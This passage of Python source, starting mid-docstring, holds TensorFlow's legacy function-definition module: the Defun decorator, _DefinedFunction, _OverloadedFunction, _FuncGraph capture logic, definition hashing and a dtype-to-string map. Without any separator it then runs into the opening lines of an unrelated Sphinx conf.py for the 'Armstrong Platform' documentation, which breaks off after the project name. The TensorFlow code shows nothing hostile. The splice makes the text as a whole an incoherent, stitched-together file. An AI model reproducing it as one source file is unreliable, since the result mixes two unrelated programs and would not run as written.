           can be specified.

         out_names = (optional). A list of strings, one per output
           tensor.

         shape_func - (optional). A function taking the op and returning a list
           of static shapes to set for the function's outputs.
    """
    self._input_types = input_types
    self._func_name = kwargs.pop("func_name", None)
    self._grad_func = kwargs.pop("grad_func", None)
    self._python_grad_func = kwargs.pop("python_grad_func", None)
    self._out_names = kwargs.pop("out_names", None)
    self._extra_kwargs = kwargs

  def __call__(self, func):
    # Various sanity checks on the callable func.
    if not callable(func):
      raise ValueError("func %s must be callable" % func)

    # Func should not use kwargs and defaults.
    argspec = tf_inspect.getargspec(func)
    if argspec.keywords or argspec.defaults:
      raise ValueError("Functions with argument defaults or keyword "
                       "arguments are not supported.")

    # Computes how many arguments 'func' has.
    min_args = len(argspec.args)
    max_args = min_args
    if argspec.varargs:
      max_args = 1000000
    argnames = argspec.args
    if tf_inspect.ismethod(func):
      # 1st argument is the "class" type.
      min_args -= 1
      argnames = argnames[1:]

    if self._input_types:
      # If Defun is given a list of types for the inputs, the number
      # of input types should be compatible with 'func'.
      num = len(self._input_types)
      if num < min_args or num > max_args:
        raise ValueError(
            "The function has fewer arguments than the number of specified "
            "input types.")
      return _DefinedFunction(
          func,
          argnames,
          self._input_types,
          self._func_name,
          self._grad_func,
          self._python_grad_func,
          out_names=self._out_names,
          **self._extra_kwargs)

    # 'func' expects no arguments and input types is an empty list.
    if min_args == 0 and max_args == 0:
      return _DefinedFunction(
          func, [], [],
          self._func_name,
          self._grad_func,
          self._python_grad_func,
          out_names=self._out_names,
          **self._extra_kwargs)

    # Input types are unknown. It's an overloaded function and hence
    # its definition needs to be deferred until it's called.
    return _OverloadedFunction(
        func,
        argnames,
        self._func_name,
        self._grad_func,
        self._python_grad_func,
        out_names=self._out_names,
        **self._extra_kwargs)


class _DefinedFunction(object):
  """_DefinedFunction encapsulates a function definition and its properties.

  Attributes:
    name: The function name.
    definition: The definition of this function. A FunctionDef proto.
    grad_func_name: If not None, the name of this function's gradient function.
    python_grad_func: A python callable implementing the gradient of
      the function python-side.
  """

  def __init__(self,
               func,
               argnames,
               input_types,
               func_name=None,
               grad_func=None,
               python_grad_func=None,
               out_names=None,
               shape_func=None,
               capture_by_value=False,
               **kwargs):
    """Creates _DefinedFunction.

    Args:
      func:  A python callable which constructs a tf function body.
      argnames: A list of strings for function argument names.
      input_types: The function's argument types. Can be a tuple, list of
        tf data types.
      func_name: The function name. Defaults to None, in which derives from
        'func'.
      grad_func: This function's gradient function, if not None. Defaults
        to None.
      python_grad_func: A python callable implementing the gradient of
        the function python-side.
      out_names: An optional list of strings for the function return value
        names.
      shape_func: An optional function mapping an op to a list of static
        output shapes.
      capture_by_value: Boolean (defaults to False). If True, captured values
        will be copied into the function body.
      **kwargs: The keyword arguments. **kwargs is passed to every call
        site of this function.

    Raises:
      ValueError: The function definition is invalid.

    """
    self._func = func
    self._input_types = input_types
    self._func_name = func_name
    self._grad_func = grad_func
    self._python_grad_func = python_grad_func
    self._out_names = out_names
    self._shape_func = shape_func
    self._capture_by_value = capture_by_value
    self._extra_kwargs = kwargs
    # Constructed only when C API is disabled, lazily
    self._definition = None
    # Constructed only when C API is enabled, lazily
    self._c_func = None
    self._sub_functions = dict()  # Constructed with _definition or _c_func
    # pylint: disable=protected-access
    device_funcs = ops.get_default_graph()._device_functions_outer_to_inner
    # pylint: enable=protected-access

    # Get the innermost device if possbile.
    self._caller_device = device_funcs[-1] if device_funcs else None

    # Cached OpDef for this function. When C API is enabled, this is
    # the only part of FunctionDef that we cache in Python. When C API
    # is disabled the whole _definition is available and this is simply
    # another reference to _definition.signature
    self._op_def = None

    assert isinstance(input_types, (list, tuple))
    self._arg_types = input_types
    self._arg_names = [argnames[i] if i < len(argnames) else ("arg%d" % i)
                       for i in range(len(input_types))]

  @property
  def name(self):
    """Function name."""
    self._create_definition_if_needed()
    return self._func_name

  @property
  def definition(self):
    """Function definition proto."""
    self._create_definition_if_needed()
    if self._c_func:
      with c_api_util.tf_buffer() as buf:
        c_api.TF_FunctionToFunctionDef(self._c_func.func, buf)
        fdef = function_pb2.FunctionDef()
        proto_data = c_api.TF_GetBuffer(buf)
        fdef.ParseFromString(compat.as_bytes(proto_data))
      return fdef
    return self._definition

  @property
  def _signature(self):
    self._create_definition_if_needed()
    return self._op_def

  def set_grad_func(self, grad_func):
    """Specifies the gradient function of this function."""
    assert not self._grad_func
    assert isinstance(grad_func, _DefinedFunction)
    self._grad_func = grad_func

  @property
  def grad_func_name(self):
    """Its gradient function's name."""
    return self._grad_func.name if self._grad_func else None

  @property
  def python_grad_func(self):
    """Python gradient function callable."""
    return self._python_grad_func

  @property
  def declared_input_types(self):
    """Returns the list of data types of explicit declared inputs."""
    return self._input_types

  @property
  def captured_inputs(self):
    """Returns the list of implicitly captured inputs."""
    self._create_definition_if_needed()
    return self._extra_inputs

  @property
  def stateful_ops(self):
    """Returns the list of stateful ops in function definition.

    Returns:
      A list of (op.name, op.type) pairs.
    """
    self._create_definition_if_needed()
    return self._stateful_ops

  def _create_definition_if_needed(self):
    """Creates the function definition if it's not created yet."""
    with context.graph_mode():
      self._create_definition_if_needed_impl()

  def _create_definition_if_needed_impl(self):
    """This is not what you want, see _create_definition_if_needed."""
    if self._definition is not None or self._c_func is not None:
      return

    temp_graph = func_graph_from_py_func(
        self._func, self._arg_names, self._arg_types, self._func_name,
        self._capture_by_value, self._caller_device)

    self._extra_inputs = temp_graph.extra_inputs
    # pylint: disable=protected-access
    self._sub_functions = temp_graph._functions
    # pylint: enable=protected-access

    # Extra kwargs are treated as attrs on the function def.
    if self._func_name:
      base_func_name = self._func_name
    else:
      base_func_name = function_utils.get_func_name(self._func)
      if self._grad_func:
        base_func_name += ("_%s" % self._grad_func.name)
    kwargs_attr = _parse_kwargs_as_attrs(base_func_name, **self._extra_kwargs)

    if not temp_graph._c_graph:  # pylint: disable=protected-access
      # Build the FunctionDef
      self._definition = graph_to_function_def.graph_to_function_def(
          temp_graph,
          temp_graph.get_operations(),
          temp_graph.inputs,
          temp_graph.outputs,
          out_names=self._out_names)

      for k in kwargs_attr:
        self._definition.attr[k].CopyFrom(kwargs_attr[k])

      # Hash the definition and its dependencies.
      self._hash_str = self._create_hash_str(
          self._definition.signature.input_arg,
          self._definition.signature.output_arg, self._definition.node_def)

      # Finally, we decide the function name to use.  If not specified,
      # make up something which is almost certainly unique (but deterministic).
      if not self._func_name:
        self._func_name = "_".join([base_func_name, self._hash_str])
      self._definition.signature.name = self._func_name
      if self._func.__doc__:
        self._definition.signature.description = self._func.__doc__

      self._op_def = self._definition.signature
    else:  # C API is enabled
      output_names = ([compat.as_bytes(x) for x in self._out_names]
                      if self._out_names else [])
      description = self._func.__doc__ or None
      # pylint: disable=protected-access
      c_func = c_api.TF_GraphToFunction_wrapper(
          temp_graph._c_graph,
          base_func_name,
          self._func_name is None,  # append_hash_to_fn_name
          None,  # opers
          [t._as_tf_output() for t in temp_graph.inputs],
          [t._as_tf_output() for t in temp_graph.outputs],
          output_names,
          None,  # opts
          description)
      self._c_func = c_api_util.ScopedTFFunction(c_func)
      # pylint: enable=protected-access
      self._set_c_attrs(kwargs_attr)

      # Set cached fields: _op_def and _func_name (if not already set)
      self._op_def = self.definition.signature
      if self._func_name:
        assert self._func_name == self._op_def.name
      else:
        self._func_name = compat.as_str(self._op_def.name)

    self._stateful_ops = [(op.name, op.type)
                          for op in temp_graph.get_operations()
                          if op.op_def.is_stateful]

  def _set_c_attrs(self, attrs):
    """Sets `attrs` as attributes of self._c_func.

    Requires that self._c_func is not None.

    Args:
      attrs: a dictionary from attribute name to attribute proto value
    """
    for name, attr_value in attrs.items():
      serialized = attr_value.SerializeToString()
      # TODO(skyewm): this creates and deletes a new TF_Status for every attr.
      # It might be worth creating a convenient way to re-use the same status.
      c_api.TF_FunctionSetAttrValueProto(self._c_func.func, compat.as_str(name),
                                         serialized)

  def _create_hash_str(self, input_arg, output_arg, node_def):
    """Creates an 8-character string unique to this input.

    Args:
      input_arg: the input_arg field of an OpDef
                 (e.g. self._definition.signature.input_arg)
      output_arg: the output_arg field of an OpDef
                 (e.g. self._definition.signature.output_arg)
      node_def: the node_def field of a FunctionDef
                (e.g. self._definition.node_def)

    Returns:
      The unique string for this input
    """
    hasher = hashlib.sha1()

    def update_num(n):
      hasher.update(compat.as_bytes("%x" % n))

    def update_str(s):
      update_num(len(s))
      hasher.update(compat.as_bytes(s))

    def update_strs(slist):
      update_num(len(slist))
      for s in slist:
        update_str(s)

    for adef in input_arg:
      update_str(adef.SerializeToString())

    for adef in output_arg:
      update_str(adef.SerializeToString())

    for n in sorted(node_def, key=lambda n: n.name):
      update_str(n.name)
      update_str(n.op)
      update_strs(n.input)
      update_num(len(n.attr))
      # NOTE: protobuf map serialization does not guarantee ordering.
      for k in sorted(n.attr):
        update_str(k)
        update_str(n.attr[k].SerializeToString())

    return hasher.hexdigest()[:8]

  def add_to_graph(self, g):
    """Adds this function into the graph g."""
    self._create_definition_if_needed()

    # Adds this function into 'g'.
    # pylint: disable=protected-access
    if context.executing_eagerly():
      context.context().add_function_def(self.definition)
    else:
      g._add_function(self)
    # pylint: enable=protected-access

    # Ensures related sub-routines are defined in 'g', too.
    for f in self._sub_functions.values():
      f.add_to_graph(g)

    # Adds its gradient function, too.
    if self._grad_func:
      self._grad_func.add_to_graph(g)

  def __call__(self, *args, **kwargs):
    self.add_to_graph(ops.get_default_graph())
    args = [ops.convert_to_tensor(_) for _ in args] + self._extra_inputs
    ret, op = _call(self._signature, *args, **kwargs)

    # Set a hidden attr in 'op' so that gradients_impl can refer back
    # to this _DefinedFunction instance to access python_grad_func.
    assert isinstance(op, ops.Operation)
    setattr(op, "__defun", self)

    if self._shape_func is not None:
      shapes = self._shape_func(op)
      if len(shapes) != len(op.outputs):
        raise ValueError("shape_func produced %d shapes for %d outputs" %
                         (len(shapes), len(op.outputs)))
      for (t, shape) in zip(op.outputs, shapes):
        t.set_shape(shape)
    return ret


class _OverloadedFunction(object):
  """_OverloadedFunction encapsulates an overloaded function.

  _OverloadedFunction maintains a mapping from input types to
  instantiated _DefinedFunction in self._overload.

  """

  def __init__(self,
               func,
               argnames,
               func_name=None,
               grad_func=None,
               python_grad_func=None,
               out_names=None,
               **kwargs):
    """Creates _DefinedFunction.

    Args:
      func:  A python callable which constructs a tf function body.
      argnames: A list of strings for function argument names.
      func_name: The function name. Defaults to None, in which derives from
        'func'.
      grad_func: This function's gradient function, if not None. Defaults
        to None.
      python_grad_func: A python callable implementing the gradient of
        the function python-side.
      out_names: A list of strings for the function return value names.
      **kwargs: The keyword arguments. **kwargs is passed to every call
        site of this function.

    Raises:
      ValueError: The function definition is invalid.

    """
    self._func = func
    self._argnames = argnames
    self._func_name = func_name
    assert grad_func is None or isinstance(grad_func, _OverloadedFunction)
    self._grad_func = grad_func
    self._python_grad_func = python_grad_func
    self._out_names = out_names
    self._extra_kwargs = kwargs
    self._overload = {}

  def instantiate(self, input_types):
    """Instantiate this function given input argument types.

    Args:
      input_types: A list of data types for the inputs.

    Returns:
      _DefinedFunction for the given input types.

    """
    # Stringify the type list.
    key = _type_list_to_str(input_types)
    defined = self._overload.get(key)
    if not defined:
      # If not defined yet, define the function given the input types.
      name = self._func_name
      if name is not None:
        name = "_".join([name, key])
      defined = _DefinedFunction(
          self._func,
          self._argnames,
          input_types,
          name,
          None,
          self._python_grad_func,
          out_names=self._out_names,
          **self._extra_kwargs)
      _ = defined.name  # Fully instantiate the function definition.
      if self._grad_func:
        # If _grad_func is given, it is another
        # _OverloadedFunction. We need to instantiate it with the
        # right input types.
        output_types = [
            dtypes.DType(_.type) for _ in defined._signature.output_arg  # pylint: disable=protected-access
        ]
        # pylint: disable=protected-access
        defined._grad_func = self._grad_func.instantiate(input_types +
                                                         output_types)
        # pylint: enable=protected-access
      self._overload[key] = defined
    return defined

  def __call__(self, *args, **kwargs):
    input_types = []
    args = list(args)
    for (i, x) in enumerate(args):
      x = ops.convert_to_tensor(x)
      if not isinstance(x, ops.Tensor):
        raise ValueError("Expect a Tensor but get ", x)
      input_types.append(x.dtype)
      args[i] = x
    return self.instantiate(input_types)(*args, **kwargs)


class _FuncGraph(ops.Graph):
  """A helper for constructing a function.

  _FuncGraph overrides ops.Graph's create_op() so that we can keep
  track of all inputs into every op created inside the function.  If
  any input is from other graphs, we keep track of it in self.capture
  and substitute the input with a place holder.

  Each captured input's corresponding place holder is converted into a
  function argument and the caller passes in the captured tensor.
  """

  def __init__(self, name, capture_by_value, *args, **kwargs):
    super(_FuncGraph, self).__init__(*args, **kwargs)
    self._capture_by_value = capture_by_value
    self._building_function = True
    self._outer_graph = ops.get_default_graph()
    self._vscope = vs.get_variable_scope()
    self._old_custom_getter = self._vscope.custom_getter

    # The name of the function.
    self.name = name
    # Placeholder tensors representing the inputs to this function. The tensors
    # are in this _FuncGraph.
    self.inputs = []
    # Tensors that will be returned this function. The tensors are in this
    # _FuncGraph.
    self.outputs = []
    # Maps external tensor -> internal tensor (e.g. input placeholder).
    self._captured = {}
    # The external tensors that have been captured as inputs and must be passed
    # to this function (empty if capturing by value, otherwise these are the
    # keys of _captured).
    self.extra_inputs = []
    # Input placeholders that been added for captured values (empty if capturing
    # by value).
    self.extra_args = []
    # Captured variables.
    # TODO(skyewm): is this needed?
    self.extra_vars = []

  # pylint: disable=g-doc-return-or-yield

  @tf_contextlib.contextmanager
  def container(self, container_name):
    """Returns a context manager that specifies the resource container to use.

    Overridden from `tf.Graph` to update both the init_scope container
    and the present inner container. This is necessary to make sure setting
    containers applies correctly both to created variables and to stateful
    ops.

    Args:
      container_name: container name string.

    Returns:
      A context manager for defining resource containers for stateful ops,
        yields the container name.
    """
    original_container = self._container
    # pylint: disable=protected-access
    with ops.init_scope():
      original_init_container = ops.get_default_graph()._container
    try:
      self._container = container_name
      with ops.init_scope():
        ops.get_default_graph()._container = container_name
      yield self._container
    finally:
      self._container = original_container
      with ops.init_scope():
        ops.get_default_graph()._container = original_init_container
    # pylint: enable=protected-access

  # pylint: enable=g-doc-return-or-yield

  def getvar(
      self,
      getter,
      name,
      shape=None,
      dtype=None,
      initializer=None,
      reuse=None,
      trainable=True,
      collections=None,  # pylint: disable=redefined-outer-name
      use_resource=None,
      **kwargs):
    """A custom variable getter."""
    # Here, we switch the default graph to the outer graph and ask the
    # variable scope in which the function is defined to give us the
    # variable. The variable is stashed in extra_vars and returned to
    # the caller.
    #
    # We capture these variables so that the variable definition is
    # hoisted upward to the outer most graph.
    with self._outer_graph.as_default():
      # pylint: disable=protected-access
      var = self._vscope.get_variable(
          vs._get_default_variable_store(),
          name,
          shape=shape,
          dtype=dtype,
          initializer=initializer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          use_resource=use_resource)
      self.extra_vars.append(var)
      if isinstance(var, resource_variable_ops.ResourceVariable):
        # For resource-based variables read the variable outside the function
        # and pass in the value. This ensures that the function is pure and
        # differentiable. TODO(apassos) this may have performance problems if
        # the function will only do embedding lookups on the variable.
        return var.value()
      return var

  def create_op(self, op_type, inputs, data_types, **kwargs):
    for i, x in enumerate(inputs):
      if isinstance(x, ops.EagerTensor) or x.graph is not self:
        inputs[i] = self.capture(x)
    return super(_FuncGraph, self).create_op(op_type, inputs, data_types,
                                             **kwargs)

  def capture(self, tensor, name=None):
    """Adds the given tensor to this graph and returns the captured tensor."""
    if tensor in self._captured:
      # Captured already.
      return self._captured[tensor]
    elif self._capture_by_value:
      return self._add_tensor_and_parents(tensor)
    else:
      return self._capture_tensor_as_extra_input(tensor, name)

  def _capture_tensor_as_extra_input(self, tensor, name=None):
    # Substitute with a placeholder.
    self.extra_inputs.append(tensor)
    # Hoist the new input placeholder out of any control flow context
    # we're currently in.
    with ops.control_dependencies(None):
      ph = array_ops.placeholder(
          tensor.dtype, shape=tensor.get_shape(), name=name)
    # pylint: disable=protected-access
    if ops._USE_C_SHAPES:
      if isinstance(tensor, ops.EagerTensor):
        handle_data = tensor._handle_data
        if handle_data:
          handle_data = handle_data.SerializeToString()
      else:
        handle_data = c_api.GetHandleShapeAndType(tensor.graph._c_graph,
                                                  tensor._as_tf_output())

      if handle_data:
        c_api.SetHandleShapeAndType(ph.graph._c_graph, ph._as_tf_output(),
                                    compat.as_bytes(handle_data))
    else:
      ph._handle_data = tensor._handle_data
    # pylint: enable=protected-access
    self.inputs.append(ph)
    self._captured[tensor] = ph
    self.extra_args.append(ph)
    if _is_guaranteed_const(tensor):
      with ops.control_dependencies(None):
        return array_ops.guarantee_const(ph)
    else:
      return ph

  def _add_tensor_and_parents(self, tensor):
    op = self._add_op_and_parents(tensor.op)
    return op.outputs[tensor.value_index]

  def _add_op_and_parents(self, op):
    # pylint: disable=protected-access
    op_def = graph_to_function_def._get_op_def(op)
    # pylint: enable=protected-access
    if op_def.is_stateful:
      raise ValueError("Cannot capture a stateful node (name:%s, type:%s) "
                       "by value." % (op.name, op.type))
    elif op.type in ("Placeholder", "PlaceholderV2"):
      raise ValueError("Cannot capture a placeholder (name:%s, type:%s) "
                       "by value." % (op.name, op.type))

    captured_inputs = [self._add_tensor_and_parents(x) for x in op.inputs]

    captured_op = self.create_op(
        op.type,
        captured_inputs, [o.dtype for o in op.outputs],
        name=op.name,
        attrs=op.node_def.attr,
        op_def=op_def)

    for t, captured_t in zip(op.outputs, captured_op.outputs):
      self._captured[t] = captured_t

    return captured_op


def func_graph_from_py_func(func, arg_names, arg_types, name=None,
                            capture_by_value=False, device=None,
                            colocation_stack=None, container=None,
                            collections_ref=None, arg_shapes=None):
  """Returns a _FuncGraph generated from `func`.

  Args:
    func: A Python callable which constructs a TF function body. The arguments
      must correspond to `arg_types`. Returns a value or list/tuple of values.
      No returned value can be None.
    arg_names: A sequence of strings for the function argument names.
    arg_types: A sequence of the function's argument types.
    name: The function name. If None, the name is derived from `func`.
    capture_by_value: boolean. If True, captured values will be copied into the
      function body.
    device: device name or function.
    colocation_stack: A colocation stack (list) the _FuncGraph should use.
    container: A container name the _FuncGraph should start with.
    collections_ref: A reference to a collections dict the _FuncGraph should
      use internally.
    arg_shapes: A sequence of the function's argument shapes.

  Returns:
    A _FuncGraph.

  Raises:
    ValueError: if func returns None.
  """
  if not name:
    name = function_utils.get_func_name(func)
  func_graph = _FuncGraph(name, capture_by_value)

  with func_graph.as_default(), ops.device(device):
    # pylint: disable=protected-access
    if collections_ref is not None:
      func_graph._collections = collections_ref
    if container is not None:
      func_graph._container = container
    if colocation_stack is not None:
      func_graph._colocation_stack = colocation_stack
    # pylint: enable=protected-access

    if arg_shapes is None:
      arg_shapes = [None] * len(arg_types)

    # Create placeholders for the function arguments.
    for (argname, argtype, argshape) in zip(arg_names, arg_types, arg_shapes):
      argholder = array_ops.placeholder(argtype, shape=argshape, name=argname)
      func_graph.inputs.append(argholder)
    # Call func and gather the output tensors.
    with vs.variable_scope("", custom_getter=func_graph.getvar):
      outputs = func(*func_graph.inputs)

    # There is no way of distinguishing between a function not returning
    # anything and a function returning None in Python.
    # We need to allow the former and ideally want to forbid the latter as
    # it is most likely user error.
    # TODO(iga): Consider adding a @NoOutput decorator on top of @Defun to
    # allow users to explicitly mark the function as not returning anything.
    # For now, we allow a single None return and interpret it as a function
    # with no output.
    if outputs is None:
      outputs = []
    else:
      # If func only returned one value, make it a tuple.
      if not isinstance(outputs, (list, tuple)):
        outputs = (outputs,)
      if any([_ is None for _ in outputs]):
        raise ValueError("Function can not return None.")
    # Ensures each output is a Tensor in the function graph.
    outputs = [ops.convert_to_tensor(t) for t in outputs]
    outputs = [func_graph.capture(t) if t.graph is not func_graph else t
               for t in outputs]
    func_graph.outputs = outputs
  return func_graph


def _is_guaranteed_const(tensor):
  """Determines whether `tensor` is guaranteed to be a constant.

  A tensor is guaranteed to be a constant if either it was produced by
  a `GuaranteeConst` op or if all of its children are guaranteed to be
  constants.

  Args:
    tensor: The tensor for which to determine const-ness.

  Returns:
    True if `tensor` is guaranteed to be a constant, False otherwise.
  """

  if isinstance(tensor, ops.EagerTensor):
    return False

  class Work(object):

    def __init__(self, op, leaving):
      self.op = op
      self.leaving = leaving

  is_guaranteed_const = lambda op: op.node_def.op == "GuaranteeConst"
  constants = set([])
  def all_inputs_const(op):
    # If all inputs of an op are guaranteed constants, then we can infer that
    # the op produces a constant as well.
    return op.inputs and all(inp.op in constants for inp in op.inputs)

  visited = set([])
  stack = [Work(tensor.op, leaving=False)]
  while stack:
    work = stack.pop()
    if work.leaving:
      if all_inputs_const(work.op):
        constants.add(work.op)
      continue
    visited.add(work.op)
    if is_guaranteed_const(work.op):
      constants.add(work.op)
      continue

    # This op will be revisited after all its inputs are checked for const-ness.
    stack.append(Work(work.op, leaving=True))
    for inp in work.op.inputs:
      if inp.op not in visited:
        stack.append(Work(inp.op, leaving=False))
  return tensor.op in constants


def _call(sig, *inputs, **kwargs):
  """Adds a node calling a function.

  This adds a `call` op to the default graph that calls the function
  of signature `sig`, passing the tensors in `inputs` as arguments.
  It returns the outputs of the call, which are one or more tensors.

  `sig` is OpDefArg.a `_DefinedFunction` object.

  You can pass an optional keyword parameter `name=string` to name the
  added operation.

  You can pass an optional keyword parameter `noinline=True|False` to
  instruct the runtime not to inline the function body into the call
  site.

  Args:
    sig: OpDefArg. The signature of the function.
    *inputs: arguments to the function.
    **kwargs: Optional keyword arguments.  Can only contain 'name' or
        'noinline'.

  Returns:
     A 2-element tuple. First element: a Tensor if the function returns a single
     value; a list of Tensors if the function returns multiple value; the
     Operation if the function returns no values. Second element: the Operation.

  Raises:
    ValueError: if the arguments are invalid.
  """
  if len(inputs) != len(sig.input_arg):
    raise ValueError("Expected number of arguments: %d, received: %d" % (len(
        sig.input_arg), len(inputs)))
  name = kwargs.pop("name", None)
  g = ops.get_default_graph()
  func_name = sig.name
  attrs = _parse_kwargs_as_attrs(func_name, **kwargs)
  output_types = [dtypes.DType(x.type) for x in sig.output_arg]
  with ops.name_scope(name, func_name, inputs) as name:
    op = g.create_op(
        func_name,
        list(inputs),
        output_types,
        name=name,
        attrs=attrs,
        op_def=sig,
        compute_shapes=False)
  if op.outputs:
    if len(op.outputs) == 1:
      ret = op.outputs[0]
    else:
      ret = tuple(op.outputs)
  else:
    ret = op
  return ret, op


def _from_definition(fdef, grad_func=None):
  """Creates a _DefinedFunction initialized from a FunctionDef proto.

  Args:
    fdef: a FunctionDef
    grad_func: a _DefinedFunction or None

  Returns:
    A _DefinedFunction representing fdef
  """
  # TODO(iga): This method does major surgery on _DefinedFunction.
  # Make it a named constructor using @classmethod of _DefinedFunction.

  # The Python callable is only needed to create a FunctionDef. Since we have
  # the FunctionDef here, we don't need to set _DefinedFunction._func (nor do we
  # have access to such a callable here).
  func = None
  argnames = [arg.name for arg in fdef.signature.input_arg]
  input_types = tuple(
      dtypes.as_dtype(arg.type) for arg in fdef.signature.input_arg)
  func_name = fdef.signature.name
  # Note: FunctionDefs do not include python gradient functions, so if the
  # original _DefinedFunction included one it will not be reflected here.
  python_grad_func = None
  out_names = [arg.name for arg in fdef.signature.output_arg]
  result = _DefinedFunction(func, argnames, input_types, func_name, grad_func,
                            python_grad_func, out_names)
  # pylint: disable=protected-access
  serialized = fdef.SerializeToString()
  c_func = c_api.TF_FunctionImportFunctionDef(serialized)
  result._c_func = c_api_util.ScopedTFFunction(c_func)
  result._extra_inputs = []
  # pylint: enable=protected-access

  return result


def _from_library(lib):
  """Creates _DefinedFunctions initialized from a FunctionDefLibrary proto.

  This method handles assigning the correct gradient functions to each
  function.

  Args:
    lib: a FunctionDefLibrary

  Returns:
    A list of _DefinedFunctions

  Raises:
    ValueError: `lib` is invalid
  """
  if not lib.function and not lib.gradient:
    return []

  # function name -> FunctionDef proto
  funcs = {fdef.signature.name: fdef for fdef in lib.function}

  # Validate that all references function names have function defs
  for g in lib.gradient:
    if g.function_name not in funcs:
      raise ValueError("FunctionDefLibrary missing '%s' FunctionDef\n%s" %
                       (g.function_name, str(lib)))
    if g.gradient_func not in funcs:
      raise ValueError("FunctionDefLibrary missing '%s' FunctionDef\n%s" %
                       (g.gradient_func, str(lib)))

  # function name -> gradient function name
  func_to_grad = collections.defaultdict(lambda: None)
  # gradient function name -> names of functions having that grad function
  grad_to_funcs = collections.defaultdict(list)

  for gdef in lib.gradient:
    func_to_grad[gdef.function_name] = gdef.gradient_func
    grad_to_funcs[gdef.gradient_func].append(gdef.function_name)

  # Start with functions without gradients
  ready = [
      fdef for fdef in lib.function if func_to_grad[fdef.signature.name] is None
  ]
  if not ready:
    raise ValueError(
        "FunctionDefLibrary contains cyclic gradient functions!\n" + str(lib))
  # function name -> _DefinedFunction
  initialized = {}

  while ready:
    fdef = ready.pop()
    name = fdef.signature.name

    grad = initialized.get(func_to_grad[name])
    if func_to_grad[name]:
      assert grad
    defined_func = _from_definition(fdef, grad_func=grad)
    initialized[name] = defined_func

    ready.extend(funcs[f] for f in grad_to_funcs[name])

  return initialized.values()


def _get_experimental_kwarg_as_attr(attr_name, value):
  """Creates an AttrValue for a python object."""
  if isinstance(value, bool):
    return attr_value_pb2.AttrValue(b=value)
  elif isinstance(value, int):
    return attr_value_pb2.AttrValue(i=value)
  elif isinstance(value, float):
    return attr_value_pb2.AttrValue(f=value)
  elif isinstance(value, str):
    return attr_value_pb2.AttrValue(s=compat.as_bytes(value))
  else:
    raise ValueError("Unsupported attribute type for %s with type %s" %
                     (attr_name, type(value)))


def _parse_kwargs_as_attrs(func_name, **kwargs):
  """Parses **kwargs into a node's attributes."""
  attrs = {}

  noinline = kwargs.pop("noinline", None)
  if noinline is not None:
    attrs["_noinline"] = attr_value_pb2.AttrValue(b=bool(noinline))

  compiled = kwargs.pop("compiled", None)
  separate_compiled_gradients = kwargs.pop("separate_compiled_gradients", None)
  if compiled is not None:
    attrs["_XlaCompile"] = attr_value_pb2.AttrValue(b=bool(compiled))
    attrs["_XlaSeparateCompiledGradients"] = attr_value_pb2.AttrValue(
        b=bool(separate_compiled_gradients))
    # Forward _XlaScope from enclosing context (if set), otherwise create new.
    # pylint: disable=protected-access
    if "_XlaScope" in ops.get_default_graph()._attr_scope_map:
      attrs["_XlaScope"] = ops.get_default_graph()._attr_scope_map["_XlaScope"]
    else:
      attrs["_XlaScope"] = attr_value_pb2.AttrValue(
          s=("function_%s" % func_name).encode())
    # pylint: enable=protected-access

  kwargs_keys = list(kwargs.keys())
  for key in kwargs_keys:
    if key.startswith("experimental_"):
      attrs[key] = _get_experimental_kwarg_as_attr(key, kwargs[key])
      del kwargs[key]

  if kwargs:
    raise ValueError("Unknown keyword arguments: %s" % kwargs.keys())
  return attrs


def get_extra_vars():
  """Returns the captured variables by the function.

  Returns:
    If the default graph is being used to define a function, the
    returned list of variables are those created inside the function
    body so far. Otherwise, returns an empty list.
  """
  g = ops.get_default_graph()
  if isinstance(g, _FuncGraph):
    return g.extra_vars
  else:
    return []


def get_extra_inputs():
  """Returns the captured input tensors by the function.

  Returns:
    If the default graph is being used to define a function, the
    returned list of tensors are those accessed inside the function body
    but defined outside the function body so far. Otherwise, returns an
    empty list.
  """
  g = ops.get_default_graph()
  if isinstance(g, _FuncGraph):
    return g.extra_inputs
  else:
    return []


def get_extra_args():
  """Returns the corresponding function arguments for the captured inputs.

  Returns:
    If the default graph is being used to define a function, the
    returned list of place holders are those used inside the function
    body corresponding those returned by get_extra_inputs(). Otherwise,
    returns an empty list.
  """
  g = ops.get_default_graph()
  if isinstance(g, _FuncGraph):
    return g.extra_args
  else:
    return []


def _type_list_to_str(types):
  if any([_ not in _DTYPE_TO_STR for _ in types]):
    raise ValueError("Unsupported dtypes: %s" % types)
  return "".join([_DTYPE_TO_STR[_] for _ in types])


# NOTE: The list needs to be extended when more data types are added.
_DTYPE_TO_STR = {
    dtypes.float16: "f16",
    dtypes.float32: "f32",
    dtypes.float64: "f64",
    dtypes.int32: "i32",
    dtypes.uint8: "i8",
    dtypes.uint16: "u16",
    dtypes.uint32: "u32",
    dtypes.uint64: "u64",
    dtypes.int16: "i16",
    dtypes.int8: "i8",
    dtypes.string: "s",
    dtypes.complex64: "c64",
    dtypes.complex128: "c128",
    dtypes.int64: "i64",
    dtypes.bool: "b",
    dtypes.qint8: "qi8",
    dtypes.quint8: "qu8",
    dtypes.qint16: "qi16",
    dtypes.quint16: "qu16",
    dtypes.qint32: "qi32",
    dtypes.bfloat16: "b16"
}


def function_def_from_tf_function(c_func):
  """Converts a SWIG-wrapped TF_Function* to a FunctionDef proto."""
  with c_api_util.tf_buffer() as buf:
    c_api.TF_FunctionToFunctionDef(c_func, buf)
    data = c_api.TF_GetBuffer(buf)
  fdef = function_pb2.FunctionDef()
  fdef.ParseFromString(compat.as_bytes(data))
  return fdef

# -*- coding: utf-8 -*-
#
# Armstrong Platform Documentation documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 26 13:38:48 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.intersphinx', 'sphinx.ext.todo']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Armstrong Platform'
